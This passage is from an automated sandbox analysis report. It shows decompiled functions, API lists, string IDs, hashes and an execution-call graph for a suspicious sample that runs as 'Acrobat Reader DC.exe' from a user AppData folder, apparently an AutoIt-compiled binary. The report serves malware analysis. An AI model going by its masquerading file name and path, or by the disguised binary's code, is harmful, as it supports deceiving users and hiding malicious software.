                                  				_t41 = (4 + _t20 * 4 >> 2) + 2;
                                  				__imp__#411(0x13, 0, _t41, _t34, _t38, _t27, __ecx);
                                  				_t35 = _t20;
                                  				if(_t35 == 0) {
                                  					E00408F40(_t35,  &_a4);
                                  					return 0;
                                  				} else {
                                  					_t8 = _t35 + 0x20; // 0x20
                                  					 *((intOrPtr*)(_t35 + 0x18)) = 0x73747263;
                                  					 *((intOrPtr*)(_t35 + 0x1c)) = _t28;
                                  					 *((intOrPtr*)(_t35 + 0x14 + _t41 * 4)) = 0;
                                  					E00410E60(_t8, _t28, _v8);
                                  					E00408F40(_t35,  &_a4);
                                  					return _t35;
                                  				}
                                  			}















                                  APIs
                                  • SafeArrayCreateVector.OLEAUT32(00000013,00000000), ref: 0044CE78
                                  • _memmove.LIBCMT ref: 0044CE9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArrayCreateSafeVector_memmove
                                  • String ID: crts
                                  • API String ID: 564309351-3724388283
                                  • Opcode ID: 7e754992b260b6e72dbf0ba7770114a121c02481734c5380321d1baa9379aa27
                                  • Instruction ID: ae18a0e6088bde325f2b8f87e65bbb2aaade0ee39655e70765b31d945e00dc0b
                                  • Opcode Fuzzy Hash: 7e754992b260b6e72dbf0ba7770114a121c02481734c5380321d1baa9379aa27
                                  • Instruction Fuzzy Hash: 7B0122B390010CABD700DF5AEC41E9B77A8EB84300F00412BFA08D7241EB31EA52C7E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E004321A4(intOrPtr _a4, signed int* _a8) {
                                  				signed char _v5;
                                  				signed char _v6;
                                  				signed char _v7;
                                  				signed int _v8;
                                  				char _v12;
                                  				signed int _t21;
                                  				intOrPtr _t39;
                                  
                                  				_t39 = _a4;
                                  				if( *((intOrPtr*)(_t39 + 0x14)) != 1) {
                                  					E00414D04( &_v12, 1, 8,  *((intOrPtr*)(_t39 + 0x1c)));
                                  				} else {
                                  					E00410E60( &_v12,  *((intOrPtr*)(_t39 + 0xc)) +  *((intOrPtr*)(_t39 + 4)), 8);
                                  				}
                                  				 *((intOrPtr*)(_t39 + 0xc)) =  *((intOrPtr*)(_t39 + 0xc)) + 8;
                                  				 *_a8 = (((_v8 & 0x000000ff) << 0x00000008 | _v7 & 0x000000ff) << 0x00000008 | _v6 & 0x000000ff) << 0x00000008 | _v5 & 0x000000ff;
                                  				_v8 = 0;
                                  				_t21 = E00414D30( &_v12, "EA06");
                                  				asm("sbb eax, eax");
                                  				return  ~( ~_t21);
                                  			}











                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock_memmove
                                  • String ID: EA06
                                  • API String ID: 1988441806-3962188686
                                  • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                  • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                  • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                  • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00442BB4(void* __ebx, void* __fp0, intOrPtr* _a4, char _a8) {
                                  				signed int _t7;
                                  				void* _t12;
                                  				signed int* _t17;
                                  				intOrPtr _t19;
                                  				void* _t21;
                                  				intOrPtr* _t22;
                                  
                                  				_t1 =  &_a8; // 0x442c75
                                  				_t7 =  *_t1 & 0x0000ffff;
                                  				_t22 = _a4;
                                  				_t20 = _t22 + 8;
                                  				_t17 = _t22 + 8;
                                  				_t19 = 0x11;
                                  				do {
                                  					_t7 = 1 - _t7 * 0x53a9b4fb;
                                  					 *_t17 = _t7;
                                  					_t17 =  &(_t17[1]);
                                  					_t19 = _t19 - 1;
                                  					_t25 = _t19;
                                  				} while (_t19 != 0);
                                  				 *_t22 = _t19;
                                  				 *((intOrPtr*)(_t22 + 4)) = 0xa;
                                  				E00410E60(_t22 + 0x4c, _t20, 0x44);
                                  				E00410E60(_t22 + 0x90, _t20, 0x44);
                                  				_t21 = 9;
                                  				do {
                                  					_t12 = E00431EC8(_t25, __fp0, _t22);
                                  					st0 = __fp0;
                                  					_t21 = _t21 - 1;
                                  				} while (_t21 != 0);
                                  				return _t12;
                                  			}










                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: u,D
                                  • API String ID: 4104443479-3858472334
                                  • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                  • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                  • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                  • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044CDE9(void* __eflags, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                  				intOrPtr* _t26;
                                  				intOrPtr* _t35;
                                  				intOrPtr* _t36;
                                  
                                  				_t26 = _a12;
                                  				_t36 = _a8;
                                  				_t35 = _a4;
                                  				E004013C0( *(_t35 + 4) +  *((intOrPtr*)(_t26 + 4)), _t36, __eflags);
                                  				E00410E60( *_t36,  *_t35,  *(_t35 + 4) +  *(_t35 + 4));
                                  				E00410E60( *_t36 +  *(_t35 + 4) * 2,  *_t26,  *((intOrPtr*)(_t26 + 4)) + 1 +  *((intOrPtr*)(_t26 + 4)) + 1);
                                  				 *((intOrPtr*)(_t36 + 4)) =  *(_t35 + 4) +  *((intOrPtr*)(_t26 + 4));
                                  				return _t36;
                                  			}







                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: Error:
                                  • API String ID: 4104443479-232661952
                                  • Opcode ID: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
                                  • Instruction ID: e6e9f2aa443a554b8bda50df2a041f2c42dbd20d32390c21629c974d0e28b4a3
                                  • Opcode Fuzzy Hash: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
                                  • Instruction Fuzzy Hash: 2101EFB6200115ABC704DF49D981D6AF7A9FF88710708855AF819CB302D774FD20CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00442651(char _a4) {
                                  				void** _t10;
                                  
                                  				_t1 =  &_a4; // 0x426561
                                  				_t10 =  *_t1;
                                  				InternetCloseHandle(_t10[1]);
                                  				InternetCloseHandle( *_t10);
                                  				 *_t10 = 0;
                                  				_t10[1] = 0;
                                  				return E004319AC( &(_t10[0x35]), 0x2710);
                                  			}





                                  APIs
                                  • InternetCloseHandle.WININET(?), ref: 00442663
                                  • InternetCloseHandle.WININET ref: 00442668
                                    • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CloseHandleInternet$ObjectSingleWait
                                  • String ID: aeB
                                  • API String ID: 857135153-906807131
                                  • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                  • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                  • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                  • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00433244(intOrPtr _a4, intOrPtr _a8, char _a12) {
                                  				void* _t8;
                                  				void* _t10;
                                  				intOrPtr _t13;
                                  				signed int _t14;
                                  
                                  				_t1 =  &_a12; // 0x425e09
                                  				_t14 =  *_t1;
                                  				_t13 = _a4;
                                  				if(_t14 != 0) {
                                  					_t10 = E00412FBA(_t13, _a8, _t14 - 1);
                                  					 *((short*)(_t13 + _t14 * 2 - 2)) = 0;
                                  					return _t10;
                                  				}
                                  				return _t8;
                                  			}








                                  APIs
                                  Strings
                                  • C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe, xrefs: 0043324B
                                  • ^B, xrefs: 00433248
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcsncpy
                                  • String ID: ^B$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 1735881322-2741327645
                                  • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                  • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                  • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                  • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00431E1F(WCHAR* _a4) {
                                  				short _v528;
                                  
                                  				GetTempPathW(0x104,  &_v528);
                                  				return GetTempFileNameW( &_v528, L"aut", 0, _a4);
                                  			}





                                  APIs
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00431E4C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Temp$FileNamePath
                                  • String ID: aut
                                  • API String ID: 3285503233-3010740371
                                  • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                  • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                  • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                  • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:8.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:1800
                                  Total number of Limit Nodes:29
27875 401fe1 27876 40bc70 52 API calls 27875->27876 27877 401ff3 27876->27877 28087 401a10 27877->28087 27879 401ffe 28094 4114ab 27879->28094 27882 428b05 27884 401a10 52 API calls 27882->27884 27883 402017 27885 4114ab __wcsicoll 58 API calls 27883->27885 27886 428b18 27884->27886 27887 402022 27885->27887 27889 401a10 52 API calls 27886->27889 27887->27886 27888 40202d 27887->27888 27890 4114ab __wcsicoll 58 API calls 27888->27890 27891 428b33 27889->27891 27892 402038 27890->27892 27894 428b3b GetModuleFileNameW 27891->27894 27893 402043 27892->27893 27892->27894 27895 4114ab __wcsicoll 58 API calls 27893->27895 27896 401a10 52 API calls 27894->27896 27899 40204e 27895->27899 27897 428b6c 27896->27897 28106 40e0a0 27897->28106 27902 428b90 _wcscpy 27899->27902 27904 401a10 52 API calls 27899->27904 27915 402092 27899->27915 27901 4020a3 27903 428bc6 27901->27903 28102 40e830 53 API calls 27901->28102 27909 401a10 52 API calls 27902->27909 27907 402073 _wcscpy 27904->27907 27905 401a10 52 API calls 27908 428b88 27905->27908 27913 401a10 52 API calls 27907->27913 27908->27902 27918 4020d0 27909->27918 27910 4020bb 28103 40cf00 53 API calls 27910->28103 27912 4020c6 27914 408f40 VariantClear 27912->27914 27913->27915 27914->27918 27915->27901 27915->27902 27916 402110 27920 408f40 VariantClear 27916->27920 27918->27916 27921 401a10 52 API calls 27918->27921 28104 40cf00 53 API calls 27918->28104 28105 40e6a0 53 API calls 27918->28105 27922 402120 moneypunct 27920->27922 27921->27918 27922->27755 27924 4295c9 _memset 27923->27924 27925 40f53c 27923->27925 27927 4295d9 GetOpenFileNameW 27924->27927 28949 410120 27925->28949 27927->27925 27929 40d5f5 27927->27929 27928 40f545 28953 4102b0 SHGetMalloc 27928->28953 27929->27763 27929->27765 27931 40f54c 28958 410190 GetFullPathNameW 27931->28958 27933 40f559 28969 40f570 27933->28969 29023 402400 27935->29023 27937 40146f 27940 428c29 _wcscat 27937->27940 29032 401500 27937->29032 27939 40147c 27939->27940 29040 40d440 
27939->29040 27942 401489 27942->27940 27943 401491 GetFullPathNameW 27942->27943 27944 402160 52 API calls 27943->27944 27945 4014bb 27944->27945 27946 402160 52 API calls 27945->27946 27947 4014c8 27946->27947 27947->27940 27948 402160 52 API calls 27947->27948 27949 4014ee 27948->27949 27949->27765 27951 428361 27950->27951 27952 4103fc LoadImageW RegisterClassExW 27950->27952 29090 44395e EnumResourceNamesW LoadImageW 27951->29090 29089 410490 7 API calls 27952->29089 27955 40d651 27957 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 27955->27957 27956 428368 27957->27777 27959 42d7ad 27958->27959 27961 409202 27958->27961 29180 45e737 90 API calls 3 library calls 27959->29180 28016 409216 moneypunct 27961->28016 29179 410940 294 API calls 27961->29179 27963 409386 27964 40939c 27963->27964 27965 40f190 10 API calls 27963->27965 27964->27778 28023 401000 Shell_NotifyIconW _memset 27964->28023 27966 4095b2 27965->27966 27966->27964 27968 401a50 272 API calls 27966->27968 27967 409253 PeekMessageW 27967->28016 27970 4095c6 LockWindowUpdate DestroyWindow GetMessageW 27968->27970 27969 42d8cd Sleep 27969->28016 27970->27964 27973 4095f9 27970->27973 27972 42e13b 29194 40d410 VariantClear 27972->29194 27976 42e158 TranslateMessage DispatchMessageW GetMessageW 27973->27976 27976->27964 27976->27976 27978 409567 PeekMessageW 27978->28016 27980 46f3c1 97 API calls 27980->28016 27981 40e0a0 52 API calls 27981->28016 27982 46fdbf 98 API calls 28021 4094e0 27982->28021 27984 42dcd2 WaitForSingleObject 27987 42dcf0 GetExitCodeProcess CloseHandle 27984->27987 27984->28016 27985 409551 TranslateMessage DispatchMessageW 27985->27978 27986 42dd3d Sleep 27986->28021 29187 40d410 VariantClear 27987->29187 27989 44c29d 52 API calls 27989->28021 27991 4094cf Sleep 27991->28021 27993 40d410 VariantClear 27993->28016 27995 42d94d timeGetTime 29183 465124 53 API calls 27995->29183 27997 40c620 timeGetTime 27997->28021 28000 42dd89 CloseHandle 28000->28021 28001 47d33e 
272 API calls 28001->28016 28002 408f40 VariantClear 28002->28021 28004 465124 53 API calls 28004->28021 28005 42de19 GetExitCodeProcess CloseHandle 28005->28021 28006 403cd0 VariantClear 28009 42de88 Sleep 28006->28009 28007 401b10 52 API calls 28007->28021 28009->28016 28012 401980 53 API calls 28012->28021 28014 408cc0 141 API calls 28014->28016 28015 45e737 90 API calls 28015->28016 28016->27963 28016->27967 28016->27969 28016->27972 28016->27978 28016->27980 28016->27981 28016->27984 28016->27985 28016->27986 28016->27991 28016->27993 28016->27995 28016->28001 28016->28014 28016->28015 28017 42e0cc VariantClear 28016->28017 28018 408f40 VariantClear 28016->28018 28016->28021 29091 4091b0 28016->29091 29149 40afa0 28016->29149 29175 4096a0 294 API calls 4 library calls 28016->29175 29176 408fc0 200 API calls moneypunct 28016->29176 29177 40d150 TranslateAcceleratorW 28016->29177 29178 40d170 IsDialogMessageW GetClassLongW 28016->29178 29181 465124 53 API calls 28016->29181 29182 40c620 timeGetTime 28016->29182 29193 40e270 VariantClear moneypunct 28016->29193 28017->28016 28018->28016 28021->27982 28021->27989 28021->27997 28021->28000 28021->28002 28021->28004 28021->28005 28021->28006 28021->28007 28021->28009 28021->28012 28021->28016 29184 45178a 54 API calls 28021->29184 29185 47d33e 294 API calls 28021->29185 29186 453bc6 54 API calls 28021->29186 29188 40d410 VariantClear 28021->29188 29189 443d19 67 API calls _wcslen 28021->29189 29190 4574b4 VariantClear 28021->29190 29191 4731e1 VariantClear 28021->29191 29192 4331a2 6 API calls 28021->29192 28022->27780 28023->27778 28024->27765 28025->27771 28026->27787 28027->27790 28029 40bc70 52 API calls 28028->28029 28030 401f31 28029->28030 28031 402560 28030->28031 28032 40256d __write_nolock 28031->28032 28110 402160 28032->28110 28035 402593 28045 4025bd 28035->28045 28123 401c90 28035->28123 28037 4026a7 28038 401b10 52 API calls 28037->28038 28044 4026db 28037->28044 28040 4026d1 28038->28040 28039 401b10 
52 API calls 28039->28045 28134 40d7c0 52 API calls 2 library calls 28040->28134 28042 401c90 52 API calls 28042->28045 28044->27857 28045->28037 28045->28039 28045->28042 28126 4026f0 28045->28126 28133 40d7c0 52 API calls 2 library calls 28045->28133 28143 40f760 28046->28143 28049 410118 28049->27859 28051 42805d 28052 42806a 28051->28052 28199 431e58 28051->28199 28054 413748 _free 46 API calls 28052->28054 28055 428078 28054->28055 28056 431e58 82 API calls 28055->28056 28057 428084 28056->28057 28057->27859 28059 4115d7 52 API calls 28058->28059 28060 401f74 28059->28060 28060->27862 28062 4019a3 28061->28062 28066 401985 28061->28066 28063 4019b8 28062->28063 28062->28066 28064 403e10 53 API calls 28063->28064 28068 4019c4 28064->28068 28065 40199f 28065->27865 28066->28065 28067 403e10 53 API calls 28066->28067 28067->28065 28068->27865 28070 40c2c7 28069->28070 28071 40c30e 28069->28071 28072 40c2d3 28070->28072 28073 426c79 28070->28073 28074 40c315 28071->28074 28075 426c2b 28071->28075 28938 403ea0 52 API calls __cinit 28072->28938 28943 4534e3 52 API calls 28073->28943 28079 40c321 28074->28079 28084 426c5a 28074->28084 28077 426c4b 28075->28077 28078 426c2e 28075->28078 28941 4534e3 52 API calls 28077->28941 28085 40c2de 28078->28085 28940 4534e3 52 API calls 28078->28940 28939 403ea0 52 API calls __cinit 28079->28939 28942 4534e3 52 API calls 28084->28942 28085->27875 28088 401a30 28087->28088 28089 401a17 28087->28089 28090 402160 52 API calls 28088->28090 28091 401a2d 28089->28091 28944 403c30 52 API calls _memmove 28089->28944 28092 401a3d 28090->28092 28091->27879 28092->27879 28095 411523 28094->28095 28096 4114ba 28094->28096 28947 4113a8 58 API calls 3 library calls 28095->28947 28101 40200c 28096->28101 28945 417f77 46 API calls __getptd_noexit 28096->28945 28099 4114c6 28946 417f25 10 API calls __mbschr_l 28099->28946 28101->27882 28101->27883 28102->27910 28103->27912 28104->27918 28105->27918 28107 40e0b2 28106->28107 28108 40e0a8 
28106->28108 28107->27905 28948 403c30 52 API calls _memmove 28108->28948 28111 426daa 28110->28111 28112 40216b _wcslen 28110->28112 28137 40c600 28111->28137 28115 402180 28112->28115 28116 40219e 28112->28116 28114 426db5 28114->28035 28135 403bd0 52 API calls moneypunct 28115->28135 28136 4013a0 52 API calls 28116->28136 28119 402187 _memmove 28119->28035 28120 4021a5 28121 426db7 28120->28121 28122 4115d7 52 API calls 28120->28122 28122->28119 28124 4026f0 52 API calls 28123->28124 28125 401c97 28124->28125 28125->28035 28127 426873 28126->28127 28128 4026ff 28126->28128 28142 4013a0 52 API calls 28127->28142 28128->28045 28130 42687b 28131 4115d7 52 API calls 28130->28131 28132 42689e _memmove 28131->28132 28132->28045 28133->28045 28134->28044 28135->28119 28136->28120 28138 40c619 28137->28138 28139 40c60a 28137->28139 28138->28114 28139->28138 28140 4026f0 52 API calls 28139->28140 28141 426d7a _memmove 28140->28141 28141->28114 28142->28130 28203 40f6f0 28143->28203 28145 40f77b moneypunct 28211 40f850 28145->28211 28150 427c2a 28241 414d04 28150->28241 28152 40f7fc 28152->28150 28153 40f804 28152->28153 28228 414a46 28153->28228 28158 40f80e 28158->28049 28162 4528bd 28158->28162 28159 427c59 28247 414fe2 28159->28247 28161 427c79 28163 4150d1 _fseek 81 API calls 28162->28163 28164 452930 28163->28164 28880 452719 28164->28880 28167 452948 28167->28051 28168 414d04 __fread_nolock 61 API calls 28169 452966 28168->28169 28170 414d04 __fread_nolock 61 API calls 28169->28170 28171 452976 28170->28171 28172 414d04 __fread_nolock 61 API calls 28171->28172 28173 45298f 28172->28173 28174 414d04 __fread_nolock 61 API calls 28173->28174 28175 4529aa 28174->28175 28176 4150d1 _fseek 81 API calls 28175->28176 28177 4529c4 28176->28177 28178 4135bb _malloc 46 API calls 28177->28178 28179 4529cf 28178->28179 28180 4135bb _malloc 46 API calls 28179->28180 28181 4529db 28180->28181 28182 414d04 __fread_nolock 61 API calls 28181->28182 28183 4529ec 28182->28183 28184 
44afef GetSystemTimeAsFileTime 28183->28184 28185 452a00 28184->28185 28186 452a36 28185->28186 28187 452a13 28185->28187 28189 452aa5 28186->28189 28190 452a3c 28186->28190 28188 413748 _free 46 API calls 28187->28188 28192 452a1c 28188->28192 28191 413748 _free 46 API calls 28189->28191 28886 44b1a9 28190->28886 28195 452aa3 28191->28195 28196 413748 _free 46 API calls 28192->28196 28194 452a9d 28197 413748 _free 46 API calls 28194->28197 28195->28051 28198 452a25 28196->28198 28197->28195 28198->28051 28200 431e64 28199->28200 28201 431e6a 28199->28201 28202 414a46 82 API calls 28200->28202 28201->28052 28202->28201 28204 425de2 28203->28204 28205 40f6fc _wcslen 28203->28205 28204->28145 28206 40f710 WideCharToMultiByte 28205->28206 28207 40f756 28206->28207 28208 40f728 28206->28208 28207->28145 28209 4115d7 52 API calls 28208->28209 28210 40f735 WideCharToMultiByte 28209->28210 28210->28145 28213 40f85d _memset _strlen 28211->28213 28212 426b3b 28213->28212 28215 40f7ab 28213->28215 28260 414db8 28213->28260 28216 4149c2 28215->28216 28275 414904 28216->28275 28218 40f7e9 28218->28150 28219 40f5c0 28218->28219 28223 40f5cd __write_nolock _memmove 28219->28223 28220 414d04 __fread_nolock 61 API calls 28220->28223 28221 40f691 __tzset_nolock 28221->28152 28223->28220 28223->28221 28227 425d11 28223->28227 28473 4150d1 28223->28473 28224 4150d1 _fseek 81 API calls 28225 425d33 28224->28225 28226 414d04 __fread_nolock 61 API calls 28225->28226 28226->28221 28227->28224 28229 414a52 _raise 28228->28229 28230 414a64 28229->28230 28231 414a79 28229->28231 28629 417f77 46 API calls __getptd_noexit 28230->28629 28233 415471 __lock_file 47 API calls 28231->28233 28238 414a74 _raise 28231->28238 28235 414a92 28233->28235 28234 414a69 28630 417f25 10 API calls __mbschr_l 28234->28630 28613 4149d9 28235->28613 28238->28158 28685 414c76 28241->28685 28243 414d1c 28244 44afef 28243->28244 28873 442c5a 28244->28873 28246 44b00d 28246->28159 28248 414fee _raise 28247->28248 
